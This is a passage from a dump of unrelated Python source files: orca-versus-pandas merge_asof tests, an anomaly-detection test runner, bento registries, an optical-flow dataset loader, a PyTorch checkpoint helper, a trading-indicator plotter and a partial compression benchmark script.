right_index=True, left_by='ticker',
right_by='ticker')
# TODO:ORCA by bug
# assert_frame_equal(odf.to_pandas().fillna(""), pdf.fillna(""), check_dtype=False, check_like=False)
def test_merge_asof_from_dfs_param_index_param_suffixes(self):
pdf = pd.merge_asof(self.pdf_csv_left_index, self.pdf_csv_right_index, left_index=True, right_index=True,
suffixes=('_left', '_right'))
odf = orca.merge_asof(self.odfs_csv_left_index, self.odfs_csv_right_index, left_index=True, right_index=True,
suffixes=('_left', '_right'))
assert_frame_equal(odf.to_pandas().fillna(""), pdf.fillna(""), check_dtype=False)
pdf = pd.merge_asof(self.pdf_bid_csv_left_index, self.pdf_bid_csv_right_index, left_index=True,
right_index=True, suffixes=('_left', '_right'))
odf = orca.merge_asof(self.odfs_bid_csv_left_index, self.odfs_bid_csv_right_index, left_index=True,
right_index=True,
suffixes=('_left', '_right'))
assert_frame_equal(odf.to_pandas().fillna(""), pdf.fillna(""), check_dtype=False, check_like=False)
def test_merge_asof_from_dfs_param_on_param_by_suffixes(self):
pdf = pd.merge_asof(self.pdf_csv_left, self.pdf_csv_right, on='date', by='ticker', suffixes=('_left', '_right'))
odf = orca.merge_asof(self.odfs_csv_left, self.odfs_csv_right, on='date', by='ticker',
suffixes=('_left', '_right'))
# TODO:ORCA by bug
# assert_frame_equal(odf.to_pandas().fillna(""), pdf.fillna(""), check_dtype=False)
pdf = pd.merge_asof(self.pdf_bid_csv_left, self.pdf_bid_csv_right, on='bid', by='ticker',
suffixes=('_left', '_right'))
odf = orca.merge_asof(self.odfs_bid_csv_left, self.odfs_bid_csv_right, on='bid', by='ticker',
suffixes=('_left', '_right'))
# TODO:ORCA by bug
# assert_frame_equal(odf.to_pandas().fillna(""), pdf.fillna(""), check_dtype=False, check_like=False)
def test_merge_asof_from_dfs_param_on_param_leftbyrightby_suffixes(self):
pdf = pd.merge_asof(self.pdf_csv_left, self.pdf_csv_right, on='date',
left_by='ticker', right_by='ticker', suffixes=('_left', '_right'))
# TODO:ORCA by bug
# odf = orca.merge_asof(self.odfs_csv_left, self.odfs_csv_right, on='date',
# left_by='ticker', right_by='ticker', suffixes=('_left', '_right'))
# assert_frame_equal(odf.to_pandas().fillna(""), pdf.fillna(""), check_dtype=False)
pdf = pd.merge_asof(self.pdf_bid_csv_left, self.pdf_bid_csv_right, on='bid', left_by='ticker',
right_by='ticker', suffixes=('_left', '_right'))
# TODO:ORCA by bug
# odf = orca.merge_asof(self.odfs_bid_csv_left, self.odfs_bid_csv_right, on='bid', left_by='ticker', right_by='ticker', suffixes=('_left', '_right'))
# assert_frame_equal(odf.to_pandas().fillna(""), pdf.fillna(""), check_dtype=False, check_like=False)
def test_merge_asof_from_dfs_param_leftonrighton_param_by_suffixes(self):
pdf = pd.merge_asof(self.pdf_csv_left, self.pdf_csv_right, left_on='date', right_on='date',
by='ticker', suffixes=('_left', '_right'))
odf = orca.merge_asof(self.odfs_csv_left, self.odfs_csv_right, left_on='date', right_on='date',
by='ticker', suffixes=('_left', '_right'))
# TODO:ORCA by bug
# assert_frame_equal(odf.to_pandas().fillna(""), pdf.fillna(""), check_dtype=False)
pdf = pd.merge_asof(self.pdf_bid_csv_left, self.pdf_bid_csv_right, left_on='bid', right_on='bid', by='ticker',
suffixes=('_left', '_right'))
pdf.fillna("", inplace=True)
odf = orca.merge_asof(self.odfs_bid_csv_left, self.odfs_bid_csv_right, left_on='bid', right_on='bid', by='ticker',
suffixes=('_left', '_right'))
# TODO:ORCA by bug
# assert_frame_equal(odf.to_pandas().fillna(""), pdf.fillna(""), check_dtype=False, check_like=False)
def test_merge_asof_from_dfs_param_leftonrighton_param_leftbyrightby_suffixes(self):
pdf = pd.merge_asof(self.pdf_csv_left, self.pdf_csv_right, left_on='date', right_on='date',
left_by='ticker', right_by='ticker', suffixes=('_left', '_right'))
# TODO:ORCA by bug
# odf = orca.merge_asof(self.odfs_csv_left, self.odfs_csv_right, left_on='date', right_on='date',
# left_by='ticker', right_by='ticker', suffixes=('_left', '_right'))
# assert_frame_equal(odf.to_pandas().fillna(""), pdf.fillna(""), check_dtype=False)
pdf = pd.merge_asof(self.pdf_bid_csv_left, self.pdf_bid_csv_right, left_on='bid', right_on='bid',
left_by='ticker', right_by='ticker', suffixes=('_left', '_right'))
# TODO:ORCA by bug
# odf = orca.merge_asof(self.odfs_bid_csv_left, self.odfs_bid_csv_right, left_on='bid', right_on='bid',
# left_by='ticker', right_by='ticker', suffixes=('_left', '_right'))
# assert_frame_equal(odf.to_pandas().fillna(""), pdf.fillna(""), check_dtype=False, check_like=False)
def test_merge_asof_from_dfs_param_index_param_by_suffixes(self):
pdf = pd.merge_asof(self.pdf_csv_left_index, self.pdf_csv_right_index, left_index=True, right_index=True,
by='ticker', suffixes=('_left', '_right'))
odf = orca.merge_asof(self.odfs_csv_left_index, self.odfs_csv_right_index, left_index=True, right_index=True,
by='ticker', suffixes=('_left', '_right'))
# TODO:ORCA by bug
# assert_frame_equal(odf.to_pandas().fillna(""), pdf.fillna(""), check_dtype=False)
pdf = pd.merge_asof(self.pdf_bid_csv_left_index, self.pdf_bid_csv_right_index, left_index=True,
right_index=True,
by='ticker', suffixes=('_left', '_right'))
odf = orca.merge_asof(self.odfs_bid_csv_left_index, self.odfs_bid_csv_right_index, left_index=True,
right_index=True,
by='ticker', suffixes=('_left', '_right'))
# TODO:ORCA by bug
# assert_frame_equal(odf.to_pandas().fillna(""), pdf.fillna(""), check_dtype=False, check_like=False)
def test_merge_asof_from_dfs_param_index_param_leftbyrightby_suffixes(self):
pdf = pd.merge_asof(self.pdf_csv_left_index, self.pdf_csv_right_index, left_index=True, right_index=True,
left_by='ticker', right_by='ticker', suffixes=('_left', '_right'))
# TODO:ORCA by bug
# odf = orca.merge_asof(self.odfs_csv_left_index, self.odfs_csv_right_index, left_index=True, right_index=True,
# left_by='ticker', right_by='ticker', suffixes=('_left', '_right'))
# assert_frame_equal(odf.to_pandas().fillna(""), pdf.fillna(""), check_dtype=False)
pdf = pd.merge_asof(self.pdf_bid_csv_left_index, self.pdf_bid_csv_right_index, left_index=True,
right_index=True,
left_by='ticker', right_by='ticker', suffixes=('_left', '_right'))
# TODO:ORCA by bug
# odf = orca.merge_asof(self.odfs_bid_csv_left_index, self.odfs_bid_csv_right_index, left_index=True, right_index=True,
# left_by='ticker', right_by='ticker', suffixes=('_left', '_right'))
# assert_frame_equal(odf.to_pandas().fillna(""), pdf.fillna(""), check_dtype=False, check_like=False)
def test_merge_asof_from_dfs_param_on_param_index(self):
pdf = pd.merge_asof(self.pdf_csv_left_index, self.pdf_csv_right, left_index=True, right_on='date')
# TODO:ORCA error left_index, right_on not supported
# odf = orca.merge_asof(self.odfs_csv_left_index, self.odfs_csv_right_index, left_index=True, right_on='date')
# assert_frame_equal(odf.to_pandas().fillna(""), pdf.fillna(""), check_dtype=False)
pdf = pd.merge_asof(self.pdf_csv_left, self.pdf_csv_right_index, right_index=True, left_on='date')
# TODO:ORCA error left_index, right_on not supported
# odf = orca.merge_asof(self.odfs_csv_left, self.odfs_csv_right_index, right_index=True, left_on='date')
# assert_frame_equal(odf.to_pandas().fillna(""), pdf.fillna(""), check_dtype=False)
pdf = pd.merge_asof(self.pdf_bid_csv_left_index, self.pdf_bid_csv_right, left_index=True, right_on='bid')
# TODO:ORCA error left_index, right_on not supported
# odf = orca.merge_asof(self.odfs_bid_csv_left_index, self.odfs_bid_csv_right, left_index=True, right_on='bid')
# assert_frame_equal(odf.to_pandas().fillna(""), pdf.fillna(""), check_dtype=False, check_like=False)
pdf = pd.merge_asof(self.pdf_bid_csv_left, self.pdf_bid_csv_right_index, right_index=True, left_on='bid')
# TODO:ORCA error left_index, right_on not supported
# odf = orca.merge_asof(self.odfs_bid_csv_left, self.odfs_bid_csv_right_index, right_index=True, left_on='bid')
# assert_frame_equal(odf.to_pandas().fillna(""), pdf.fillna(""), check_dtype=False, check_like=False)
def test_merge_asof_from_dfs_param_on_param_index_param_by(self):
pdf = pd.merge_asof(self.pdf_csv_left_index, self.pdf_csv_right, left_index=True, right_on='date', by='ticker')
# TODO:ORCA by bug
# odf = orca.merge_asof(self.odfs_csv_left_index, self.odfs_csv_right_index, left_index=True, right_on='date', by='ticker')
# assert_frame_equal(odf.to_pandas().fillna(""), pdf.fillna(""), check_dtype=False)
pdf = pd.merge_asof(self.pdf_csv_left, self.pdf_csv_right_index, right_index=True, left_on='date', by='ticker')
# TODO:ORCA by bug
# odf = orca.merge_asof(self.odfs_csv_left_index, self.odfs_csv_right_index, right_index=True, left_on='date', by='ticker')
# assert_frame_equal(odf.to_pandas().fillna(""), pdf.fillna(""), check_dtype=False)
pdf = pd.merge_asof(self.pdf_bid_csv_left_index, self.pdf_bid_csv_right, left_index=True, right_on='bid',
by='ticker')
# TODO:ORCA by bug
# odf = orca.merge_asof(self.odfs_bid_csv_left_index, self.odfs_bid_csv_right, left_index=True, right_on='bid', by='ticker')
# assert_frame_equal(odf.to_pandas().fillna(""), pdf.fillna(""), check_dtype=False, check_like=False)
pdf = pd.merge_asof(self.pdf_bid_csv_left, self.pdf_bid_csv_right_index, right_index=True, left_on='bid',
by='ticker')
# TODO:ORCA by bug
# odf = orca.merge_asof(self.odfs_bid_csv_left, self.odfs_bid_csv_right_index, right_index=True, left_on='bid', by='ticker')
# assert_frame_equal(odf.to_pandas().fillna(""), pdf.fillna(""), check_dtype=False, check_like=False)
def test_merge_asof_from_dfs_param_on_param_index_param_by_param_suffixes(self):
pdf = pd.merge_asof(self.pdf_csv_left_index, self.pdf_csv_right, left_index=True, right_on='date',
by='ticker', suffixes=('_left', '_right'))
# TODO:ORCA by bug
# odf = orca.merge_asof(self.odfs_csv_left_index, self.odfs_csv_right_index, left_index=True, right_on='date',
# by='ticker', suffixes=('_left', '_right'))
# assert_frame_equal(odf.to_pandas().fillna(""), pdf.fillna(""), check_dtype=False)
pdf = pd.merge_asof(self.pdf_csv_left, self.pdf_csv_right_index, right_index=True, left_on='date',
by='ticker', suffixes=('_left', '_right'))
# TODO:ORCA by bug
# odf = orca.merge_asof(self.odfs_csv_left_index, self.odfs_csv_right_index, right_index=True, left_on='date',
# by='ticker', suffixes=('_left', '_right'))
# assert_frame_equal(odf.to_pandas().fillna(""), pdf.fillna(""), check_dtype=False)
pdf = pd.merge_asof(self.pdf_bid_csv_left_index, self.pdf_bid_csv_right, left_index=True, right_on='bid',
by='ticker', suffixes=('_left', '_right'))
# TODO:ORCA by bug
# odf = orca.merge_asof(self.odfs_bid_csv_left_index, self.odfs_bid_csv_right, left_index=True, right_on='bid',
# by='ticker', suffixes=('_left', '_right'))
# assert_frame_equal(odf.to_pandas().fillna(""), pdf.fillna(""), check_dtype=False, check_like=False)
pdf = pd.merge_asof(self.pdf_bid_csv_left, self.pdf_bid_csv_right_index, right_index=True, left_on='bid',
by='ticker', suffixes=('_left', '_right'))
# TODO:ORCA by bug
# odf = orca.merge_asof(self.odfs_bid_csv_left, self.odfs_bid_csv_right_index, right_index=True, left_on='bid',
# by='ticker', suffixes=('_left', '_right'))
# assert_frame_equal(odf.to_pandas().fillna(""), pdf.fillna(""), check_dtype=False, check_like=False)
if __name__ == '__main__':
unittest.main()
|
1690940
|
import argparse
from argparse import Namespace
from datasets import CIFAR10
from datasets import MNIST
from datasets import SHANGHAITECH
from datasets import UCSDPed2
from models import LSACIFAR10
from models import LSAMNIST
from models import LSAShanghaiTech
from models import LSAUCSD
from result_helpers import OneClassResultHelper
from result_helpers import VideoAnomalyDetectionResultHelper
from utils import set_random_seed
def test_mnist():
# type: () -> None
"""
Performs One-class classification tests on MNIST
"""
# Build dataset and model
dataset = MNIST(path='data/MNIST')
model = LSAMNIST(input_shape=dataset.shape, code_length=64, cpd_channels=100).cuda().eval()
# Set up result helper and perform test
helper = OneClassResultHelper(dataset, model, checkpoints_dir='checkpoints/mnist/', output_file='mnist.txt')
helper.test_one_class_classification()
def test_cifar():
# type: () -> None
"""
Performs One-class classification tests on CIFAR
"""
# Build dataset and model
dataset = CIFAR10(path='data/CIFAR10')
model = LSACIFAR10(input_shape=dataset.shape, code_length=64, cpd_channels=100).cuda().eval()
# Set up result helper and perform test
helper = OneClassResultHelper(dataset, model, checkpoints_dir='checkpoints/cifar10/', output_file='cifar10.txt')
helper.test_one_class_classification()
def test_ucsdped2():
# type: () -> None
"""
Performs video anomaly detection tests on UCSD Ped2.
"""
# Build dataset and model
dataset = UCSDPed2(path='data/UCSD_Anomaly_Dataset.v1p2')
model = LSAUCSD(input_shape=dataset.shape, code_length=64, cpd_channels=100).cuda().eval()
# Set up result helper and perform test
helper = VideoAnomalyDetectionResultHelper(dataset, model,
checkpoint='checkpoints/ucsd_ped2.pkl', output_file='ucsd_ped2.txt')
helper.test_video_anomaly_detection()
def test_shanghaitech():
# type: () -> None
"""
Performs video anomaly detection tests on ShanghaiTech.
"""
# Build dataset and model
dataset = SHANGHAITECH(path='data/shanghaitech')
model = LSAShanghaiTech(input_shape=dataset.shape, code_length=64, cpd_channels=100).cuda().eval()
# Set up result helper and perform test
helper = VideoAnomalyDetectionResultHelper(dataset,
model,
checkpoint='checkpoints/shanghaitech.pkl',
output_file='shanghaitech.txt')
helper.test_video_anomaly_detection()
def parse_arguments():
# type: () -> Namespace
"""
Argument parser.
:return: the command line arguments.
"""
parser = argparse.ArgumentParser(formatter_class=argparse.ArgumentDefaultsHelpFormatter)
parser.add_argument('dataset', type=str,
help='The name of the dataset to perform tests on.'
'Choose among `mnist`, `cifar10`, `ucsd-ped2`, `shanghaitech`', metavar='')
return parser.parse_args()
def main():
# Parse command line arguments
args = parse_arguments()
# Lock seeds
set_random_seed(30101990)
# Run test
if args.dataset == 'mnist':
test_mnist()
elif args.dataset == 'cifar10':
test_cifar()
elif args.dataset == 'ucsd-ped2':
test_ucsdped2()
elif args.dataset == 'shanghaitech':
test_shanghaitech()
else:
raise ValueError(f'Unknown dataset: {args.dataset}')
# Entry point
if __name__ == '__main__':
main()
|
1690959
|
from bento.compat.api \
import \
defaultdict
class CommandRegistry(object):
def __init__(self):
# command line name -> command class
self._klasses = {}
# command line name -> None for private commands
self._privates = {}
def register(self, name, cmd_klass, public=True):
if name in self._klasses:
raise ValueError("context for command %r already registered !" % name)
else:
self._klasses[name] = cmd_klass
if not public:
self._privates[name] = None
def retrieve(self, name):
cmd_klass = self._klasses.get(name, None)
if cmd_klass is None:
raise ValueError("No command class registered for name %r" % name)
else:
return cmd_klass
def is_registered(self, name):
return name in self._klasses
def command_names(self):
return self._klasses.keys()
def public_command_names(self):
return [k for k in self._klasses.keys() if not k in self._privates]
class ContextRegistry(object):
def __init__(self, default=None):
self._contexts = {}
self.set_default(default)
def set_default(self, default):
self._default = default
def is_registered(self, cmd_name):
return cmd_name in self._contexts
def register(self, cmd_name, context):
if cmd_name in self._contexts:
raise ValueError("context for command %r already registered !" % cmd_name)
else:
self._contexts[cmd_name] = context
def retrieve(self, cmd_name):
context = self._contexts.get(cmd_name, None)
if context is None:
if self._default is None:
raise ValueError("No context registered for command %r" % cmd_name)
else:
return self._default
else:
return context
class OptionsRegistry(object):
"""Registry for command -> option context"""
def __init__(self):
# command line name -> context *instance*
self._contexts = {}
def register(self, cmd_name, options_context):
if cmd_name in self._contexts:
raise ValueError("options context for command %r already registered !" % cmd_name)
else:
self._contexts[cmd_name] = options_context
def is_registered(self, cmd_name):
return cmd_name in self._contexts
def retrieve(self, cmd_name):
options_context = self._contexts.get(cmd_name, None)
if options_context is None:
raise ValueError("No options context registered for cmd_name %r" % cmd_name)
else:
return options_context
class _Dummy(object):
pass
class _RegistryBase(object):
"""A simple registry of sets of callbacks, one set per category."""
def __init__(self):
self._callbacks = {}
self.categories = _Dummy()
def register_category(self, category, default_builder):
if category in self._callbacks:
raise ValueError("Category %r already registered" % category)
else:
self._callbacks[category] = defaultdict(lambda: default_builder)
setattr(self.categories, category, _Dummy())
def register_callback(self, category, name, builder):
c = self._callbacks.get(category, None)
if c is not None:
c[name] = builder
cat = getattr(self.categories, category)
setattr(cat, name, builder)
else:
raise ValueError("category %s is not registered yet" % category)
def callback(self, category, name):
if not category in self._callbacks:
raise ValueError("Unregistered category %r" % category)
else:
return self._callbacks[category][name]
def default_callback(self, category, *a, **kw):
if not category in self._callbacks:
raise ValueError("Unregistered category %r" % category)
else:
return self._callbacks[category].default_factory()(*a, **kw)
class BuilderRegistry(_RegistryBase):
builder = _RegistryBase.callback
class ISectionRegistry(_RegistryBase):
registrer = _RegistryBase.callback
class OutputRegistry(object):
def __init__(self, categories=None):
self.categories = {}
self.installed_categories = {}
if categories:
for category, installed_category in categories:
self.register_category(category, installed_category)
def register_category(self, category, installed_category):
if category in self.categories:
raise ValueError("Category %r already registered")
else:
self.categories[category] = {}
self.installed_categories[category] = installed_category
def register_outputs(self, category, name, nodes, from_node, target_dir):
if not category in self.categories:
raise ValueError("Unknown category %r" % category)
else:
cat = self.categories[category]
if name in cat:
raise ValueError("Outputs for categoryr=%r and name=%r already registered" % (category, name))
else:
cat[name] = (nodes, from_node, target_dir)
def iter_category(self, category):
if not category in self.categories:
raise ValueError("Unknown category %r" % category)
else:
for k, v in self.categories[category].items():
yield k, v[0], v[1], v[2]
def iter_over_category(self):
for category in self.categories:
for name, nodes, from_node, target_dir in self.iter_category(category):
yield category, name, nodes, from_node, target_dir
|
1690979
|
import os
import os.path as osp
import sys
import torch
import torch.utils.data as data
import torchvision.transforms as transforms
import cv2
import numpy as np
from .config import cfg, MEANS, STD
from pycocotools import mask as maskUtils
import contextlib
import io
import logging
import time
def collate_fn_flying_chairs(batch):
imgs_1 = []
imgs_2 = []
flows = []
for sample in batch:
imgs_1.append(sample[0])
imgs_2.append(sample[1])
flows.append(sample[2])
return torch.stack(imgs_1, 0), torch.stack(imgs_2, 0), torch.stack(flows, 0)
class FlyingChairs(data.Dataset):
"""`YoutubeVIS <https://youtube-vos.org/dataset/vis/>`_ Dataset.
Args:
root (string): Root directory where images are downloaded to.
set_name (string): Name of the specific set of COCO images.
transform (callable, optional): A function/transform that augments the
raw images`
target_transform (callable, optional): A function/transform that takes
in the target (bbox) and transforms it.
prep_crowds (bool): Whether or not to prepare crowds for the evaluation step.
"""
def __init__(self, image_path, info_file, is_train=True):
# Do this here because we have too many things named COCO
self.root = image_path
with open(info_file, "r") as file:
res = file.read()
ids = res.split('\n')
ids = [int(x) for x in ids if x]
keep_label = 1 if is_train else 2
ids = {idx: x for idx, x in enumerate(ids) if x == keep_label}
self.ids = list(ids.keys())
def __getitem__(self, index):
flow_id = self.ids[index] + 1
img1_path = os.path.join(self.root, "{:05d}_img1.ppm".format(flow_id))
img2_path = os.path.join(self.root, "{:05d}_img2.ppm".format(flow_id))
flow_path = os.path.join(self.root, "{:05d}_flow.flo".format(flow_id))
img1 = self.readImage(img1_path)
img2 = self.readImage(img2_path)
flow = self.readFlow(flow_path)
h, w, _ = img1.shape
flow = flow * 2 / np.array([w, h]) * 8
target_size = (550, 550) # FIXME: hard code image size
img1 = cv2.resize(img1, target_size)
img2 = cv2.resize(img2, target_size)
flow = cv2.resize(flow, target_size)
img1 = (img1 - MEANS) / STD
img2 = (img2 - MEANS) / STD
img1 = img1[:, :, ::-1]
img2 = img2[:, :, ::-1]
img1 = img1.astype(np.float32)
img2 = img2.astype(np.float32)
flow = flow.astype(np.float32)
t = transforms.ToTensor()
return t(img1), t(img2), t(flow)
def __len__(self):
return len(self.ids)
@staticmethod
def readFlow(name):
f = open(name, 'rb')
header = f.read(4)
if header.decode("utf-8") != 'PIEH':
raise Exception('Flow file header does not contain PIEH')
width = np.fromfile(f, np.int32, 1).squeeze()
height = np.fromfile(f, np.int32, 1).squeeze()
flow = np.fromfile(f, np.float32, width * height * 2).reshape((height, width, 2))
return flow.astype(np.float32)
@staticmethod
def readImage(name):
return cv2.imread(name)
|
1691042
|
import os
import torch
import torch.nn as nn
from core.model_transform import *
from core.utils import is_main_process
__all__ = ["CheckPoint"]
class CheckPoint(object):
"""
save model state to file
check_point_params: model, optimizer, epoch
"""
def __init__(self, save_path, logger):
self.save_path = os.path.join(save_path, "check_point")
self.check_point_params = {
"model": None,
"optimizer": None,
"lr_scheduler": None,
"epoch": None,
}
self.logger = logger
# make directory
if is_main_process():
if not os.path.isdir(self.save_path):
os.makedirs(self.save_path)
def load_state(self, model, state_dict):
"""
load state_dict to model
:params model:
:params state_dict:
:return: model
"""
model.eval()
model_dict = model.state_dict()
for key, value in list(state_dict.items()):
if key in list(model_dict.keys()):
model_dict[key] = value
else:
if self.logger:
self.logger.error("key error: {}".format(key))
# assert False
model.load_state_dict(model_dict)
return model
def load_model(self, model_path):
"""
load model
:params model_path: path to the model
:return: model_state_dict
"""
if os.path.isfile(model_path):
if self.logger:
self.logger.info("|===>Load retrain model from: {}".format(model_path))
model_state_dict = torch.load(model_path, map_location={"cpu"})
return model_state_dict
else:
assert False, "file not exits, model path: " + model_path
def load_checkpoint(self, checkpoint_path):
"""
load checkpoint file
:params checkpoint_path: path to the checkpoint file
:return: model_state_dict, optimizer_state_dict, epoch
"""
if os.path.isfile(checkpoint_path):
if self.logger:
self.logger.info(
"|===>Load resume check-point from: {}".format(checkpoint_path)
)
self.check_point_params = torch.load(checkpoint_path, map_location="cpu")
model_state_dict = self.check_point_params["model"]
optimizer_state_dict = self.check_point_params["optimizer"]
lr_scheduler = self.check_point_params["lr_scheduler"]
epoch = self.check_point_params["epoch"]
return model_state_dict, optimizer_state_dict, epoch, lr_scheduler
else:
assert False, "file not exits" + checkpoint_path
def save_checkpoint(self, model, optimizer, lr_scheduler, epoch, index=0):
"""
:params model: model
:params optimizer: optimizer
:params epoch: training epoch
:params index: index of saved file, default: 0
Note: if we add hook to the grad by using register_hook(hook), then the hook function
can not be saved so we need to save state_dict() only. Although save state dictionary
is recommended, some times we still need to save the whole model as it can save all
the information of the trained model, and we do not need to create a new network in
next time. However, the GPU information will be saved too, which leads to some issues
when we use the model on different machine
"""
# get state_dict from model and optimizer
model = list2sequential(model)
if isinstance(model, nn.DataParallel):
model = model.module
model = model.state_dict()
optimizer = optimizer.state_dict()
lr_scheduler = lr_scheduler.state_dict()
# save information to a dict
self.check_point_params["model"] = model
self.check_point_params["optimizer"] = optimizer
self.check_point_params["lr_scheduler"] = lr_scheduler
self.check_point_params["epoch"] = epoch
# save to file
torch.save(
self.check_point_params,
os.path.join(self.save_path, "checkpoint_{:0>3d}.pth".format(index)),
)
def save_model(self, model, best_flag=False, index=0, tag=""):
"""
:params model: model to save
:params best_flag: if True, the saved model is the one that gets best performance
"""
# get state dict
model = list2sequential(model)
if isinstance(model, nn.DataParallel):
model = model.module
model = model.state_dict()
if best_flag:
if tag != "":
torch.save(
model, os.path.join(self.save_path, "{}_best_model.pth".format(tag))
)
else:
torch.save(model, os.path.join(self.save_path, "best_model.pth"))
else:
if tag != "":
torch.save(
model,
os.path.join(
self.save_path, "{}_model_{:0>3d}.pth".format(tag, index)
),
)
else:
torch.save(
model,
os.path.join(self.save_path, "model_{:0>3d}.pth".format(index)),
)
|
1691043
|
import plotly.graph_objects as go
from plotly.subplots import make_subplots
import pandas as pd
import numpy as np
import argparse
import backtest
import indicators
import strategies
def main():
parser = argparse.ArgumentParser()
parser.add_argument("file")
parser.add_argument("--sma", type=int, nargs='+', help='Adds SMA to the price graph')
parser.add_argument("--ema", type=int, nargs='+', help='Adds EMA to the price graph')
parser.add_argument("--rsi", type=int, help='Adds RSI in a subplot')
parser.add_argument("--macd", type=int, nargs=3, help='Adds MACD in a subplot')
parser.add_argument("--bbands", type=int, nargs=2, help='Adds Bollinger Bands to the price graph')
parser.add_argument("--strategy", type=int, nargs='+', help='Adds a strategy, 1 : EMA Cross')
args = parser.parse_args()
ohlc = pd.read_csv(args.file, index_col='time', parse_dates=True)
close = ohlc['close']
# calculates the number of sublots
rows = 1
if args.rsi != None:
rows += 1
if args.macd != None:
rows += 1
fig = make_subplots(rows=rows, cols=1, shared_xaxes=True)
# plots close bar graph with averages
row = 1
fig.add_trace(go.Scatter(x=ohlc.index, y=close, name="Close"), row=row, col=1)
if args.ema != None:
for period in args.ema:
ema = indicators.EMA(close, period)
fig.add_trace(go.Scatter(x=ohlc.index, y=ema.df['ema{}'.format(period)], name="EMA {}".format(period)), row=row, col=1)
if args.sma != None:
for period in args.sma:
sma = indicators.SMA(close, period)
fig.add_trace(go.Scatter(x=ohlc.index, y=sma.df['sma{}'.format(period)], name="SMA {}".format(period)), row=row, col=1)
# plots Bollinger Bands
if args.bbands != None:
bbands = indicators.BollingerBands(close, args.bbands[0])
fig.add_trace(go.Scatter(x=ohlc.index, y=bbands.df.ma), row=row, col=1)
fig.add_trace(go.Scatter(x=ohlc.index, y=bbands.df.upper), row=row, col=1)
fig.add_trace(go.Scatter(x=ohlc.index, y=bbands.df.lower), row=row, col=1)
row += 1
row += 1
# plots RSI
if args.rsi != None:
rsi = indicators.RSI(close, args.rsi)
fig.add_trace(go.Scatter(x=ohlc.index, y=rsi.df.rsi, name="RSI {}".format(args.rsi)), row=row, col=1)
row += 1
# plots MACD
if args.macd != None:
macd = indicators.MACD(close, args.macd[0], args.macd[1], args.macd[2])
fig.add_trace(go.Scatter(x=ohlc.index, y=macd.df.MACD, name="MACD {} {} {}".format(args.macd[0], args.macd[1], args.macd[2])), row=row, col=1)
fig.add_trace(go.Scatter(x=ohlc.index, y=macd.df.signal, name="MACD Signal"), row=row, col=1)
row += 1
# plots strategy
if args.strategy != None:
if args.strategy[0] == 1:
fast_ema = indicators.EMA(ohlc.close, period=args.strategy[1])
slow_ema = indicators.EMA(ohlc.close, period=args.strategy[2])
strategy = strategies.AvgCrossStrategy(ohlc.close, fast_ema.data(), slow_ema.data())
fig.add_trace(go.Scatter(x=close.loc[strategy.signals['positions'] == 1.0].index, y=close.loc[strategy.signals['positions'] == 1.0],
mode='markers', marker=dict(size=12, symbol='triangle-up', color='green'), name="Buy"), row=1, col=1)
fig.add_trace(go.Scatter(x=close.loc[strategy.signals['positions'] == -1.0].index, y=close.loc[strategy.signals['positions'] == -1.0],
mode='markers', marker=dict(size=12, symbol='triangle-down', color='red'), name="Sell"), row=1, col=1)
elif args.strategy[0] == 2:
macd = indicators.MACD(ohlc.close, args.strategy[1], args.strategy[2], args.strategy[3])
strategy = strategies.MACDStrategy(ohlc.close, macd)
fig.add_trace(go.Scatter(x=close.loc[strategy.signals['positions'] == 1.0].index, y=close.loc[strategy.signals['positions'] == 1.0],
mode='markers', marker=dict(size=12, symbol='triangle-up', color='green'), name="Buy"), row=1, col=1)
fig.add_trace(go.Scatter(x=close.loc[strategy.signals['positions'] == -1.0].index, y=close.loc[strategy.signals['positions'] == -1.0],
mode='markers', marker=dict(size=12, symbol='triangle-down', color='red'), name="Sell"), row=1, col=1)
elif args.strategy[0] == 3:
bb1 = indicators.BollingerBands(ohlc.close, 20, 1)
bb2 = indicators.BollingerBands(ohlc.close, 20, 2)
strategy = strategies.DBBStrategy(ohlc.close, bb1, bb2)
fig.add_trace(go.Scatter(x=close.loc[strategy.signals['positions'] == 1.0].index, y=close.loc[strategy.signals['positions'] == 1.0],
mode='markers', marker=dict(size=12, symbol='triangle-up', color='green'), name="Buy"), row=1, col=1)
fig.add_trace(go.Scatter(x=close.loc[strategy.signals['positions'] == -1.0].index, y=close.loc[strategy.signals['positions'] == -1.0],
mode='markers', marker=dict(size=12, symbol='triangle-down', color='red'), name="Sell"), row=1, col=1)
elif args.strategy[0] == 4:
rsi = indicators.RSI(ohlc.close, 9)
macd = indicators.MACD(ohlc.close, 12, 26, 9)
strategy = strategies.RSIMACDStrategy(ohlc.close, rsi, macd)
fig.add_trace(go.Scatter(x=close.loc[strategy.signals['positions'] == 1.0].index, y=close.loc[strategy.signals['positions'] == 1.0],
mode='markers', marker=dict(size=12, symbol='triangle-up', color='green'), name="Buy"), row=1, col=1)
fig.add_trace(go.Scatter(x=close.loc[strategy.signals['positions'] == -1.0].index, y=close.loc[strategy.signals['positions'] == -1.0],
mode='markers', marker=dict(size=12, symbol='triangle-down', color='red'), name="Sell"), row=1, col=1)
fig.show()
if __name__ == "__main__":
main()
|
1691054
|
import os
import sys
from pathlib import Path
from helpers.generator import generate_files
from helpers.files import download_file, CompressionResult, discover, FileData
# Add the engine directory to the path of importable directories
engine_path = os.getcwd() + "/engine"
sys.path.append(engine_path)
from engine import engine
def benchmark(training_set, downloads, algorithms, generate=False, download=False, fresh=False, delete_at_end=False):
Path("files").mkdir(parents=True, exist_ok=True)
os.chdir("files")
filenames = discover()
if fresh:
for filename in filenames:
os.remove(filename)
filenames = []
if generate:
filenames += generate_files(training_set)
if download:
for to_download in downloads:
url = to_download[0]
unzip = to_download[1]
filenames += download_file(url, unzip=unzip)
files = []
for filename in filenames:
files.append(FileData(filename))
try:
data = benchmark_files(files, algorithms)
except Exception as e:
if delete_at_end:
print("Exception occured, cleaning up files")
for file in files:
file.delete()
raise e
for file in files:
if delete_at_end:
file.delete()
os.chdir("..")
print("Finished benchmarks" + " and cleaned up files" if delete_at_end else "")
print("Converting to dict/array-based objects for serialization...")
serialized_files = []
for result in data:
serialized_file = {
"name": result.file.filename,
"type": result.file.filetype,
"entropy": result.file.entropy,
"size": result.file.size,
"best_result": clean_fields(result.best_result()),
"results": []
}
for compression_result in result.results:
serialized_file["results"].append(clean_fields(compression_result))
serialized_files.append(serialized_file)
serialized_data = {
"files": serialized_files
}
return serialized_data
def clean_fields(compression_result):
return {
"engine": compression_result.CompressionEngine,
"time_taken": compression_result.TimeTaken,
"compressed_ratio": compression_result.Ratio,
"entropy": compression_result.Entropy,
"compressed_entropy": compression_result.ActualEntropy,
"lossless": compression_result.Lossless,
"failed": compression_result.Failed,
}
def benchmark_files(files, algorithms):
data = []
